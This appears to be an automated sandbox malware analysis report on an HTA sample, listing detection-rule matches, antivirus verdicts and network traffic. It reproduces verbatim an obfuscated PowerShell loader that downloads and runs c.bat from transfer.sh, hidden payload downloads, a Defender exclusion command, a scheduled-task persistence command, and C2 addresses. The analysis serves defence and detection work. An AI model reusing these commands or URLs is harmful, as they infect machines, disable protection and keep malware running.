Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", ProcessId: 7604, ProcessName: powershell.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGY
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Roaming\c.bat
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGY
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", ProcessId: 7604, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: msword.com , ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.com, ParentProcessId: 9108, ParentProcessName: msword.com, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', ProcessId: 8056, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: msword.com , ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.com, ParentProcessId: 9108, ParentProcessName: msword.com, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe, ProcessId: 8424, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: msword.com , ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.com, ParentProcessId: 9108, ParentProcessName: msword.com, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe, ProcessId: 8424, ProcessName: schtasks.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", ProcessId: 7604, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGY
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7748, ProcessName: svchost.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: p5.htaAvira: detected
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comVirustotal: Detection: 25%Perma Link
Source: C:\Users\user\AppData\Roaming\msword.exeVirustotal: Detection: 25%Perma Link
Source: p5.htaReversingLabs: Detection: 39%
Source: p5.htaVirustotal: Detection: 40%Perma Link
Source: C:\Users\user\AppData\Roaming\msword.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 4x nop then mov rdi, 0000800000000000h17_2_00E94060
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 4x nop then mov rsi, r917_2_00E95520
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 4x nop then mov rdi, 0000800000000000h30_2_00D14060
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 4x nop then mov rsi, r930_2_00D15520
Source: global trafficTCP traffic: 192.168.2.4:49750 -> 45.88.186.197:7008
Source: global trafficHTTP traffic detected: GET /get/YqLLdAKXyI/c.bat HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox ViewIP Address: 23.46.240.131 23.46.240.131
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /get/fHMB2lI9W3/W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /get/WD631pf02G/msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.46.240.131
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /get/YqLLdAKXyI/c.bat HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /get/fHMB2lI9W3/W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /get/WD631pf02G/msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknownDNS traffic detected: queries for: transfer.sh
Source: powershell.exe, 00000001.00000002.1662915027.0000000003659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftK
Source: svchost.exe, 00000006.00000002.2872187670.0000019D43C8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43E18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43E18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43E18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43E18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43E4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1667721029.000000000603D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2073502677.00000277DA4F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2195135185.000001D176238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2327399027.0000020990074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000012.00000002.2047498345.00000277CA721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D1663E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020980227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1664032088.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, msword.com, 00000011.00000002.2874555447.0000021762A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047498345.00000277CA481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D1661C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.2047498345.00000277CA721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D1663E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020980227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1664032088.000000000563F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.sh
Source: powershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
